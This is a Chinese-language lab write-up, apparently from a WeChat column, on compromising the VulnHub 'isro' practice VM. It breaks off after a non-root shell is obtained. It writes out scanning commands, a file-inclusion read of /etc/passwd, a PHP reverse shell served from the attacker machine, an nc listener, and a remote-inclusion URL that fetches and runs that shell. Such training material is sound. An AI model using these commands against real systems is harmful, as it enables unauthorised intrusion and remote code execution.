今天看啥  ›  专栏  ›  云计算和网络安全技术实践

vulnhub之isro的实践

云计算和网络安全技术实践  · 公众号  ·  · 2024-04-01 08:50
本周实践的是vulnhub的isro镜像,下载地址,https://download.vulnhub.com/ha/isro.zip,用workstation导入成功,做地址扫描,sudo netdiscover -r 192.168.220.0/24,获取到靶机地址是192.168.220.164,接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.220.164,发现靶机有80端口的http服务,进行php类型的文件路径扫描,dirb http://192.168.220.164 -X .php,获取到http://192.168.220.164/connect.php,猜测connect.php有文件包含漏洞,确认一下,浏览器访问http://192.168.220.164/connect.php?file=/etc/passwd,在kali攻击机上制作反弹shell文件,修改好地址和端口,cp /usr/share/webshells/php/php-reverse-shell.php shell.php,在kali攻击机上开启http下载服务,python2 -m SimpleHTTPServer,在kali攻击机上开启反弹shell监听,nc -lvp 4444,浏览器访问http://192.168.220.164/connect.php?file=http://192.168.220.157:8000/shell.php,获取到反弹shell,id确认不是root,转成 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照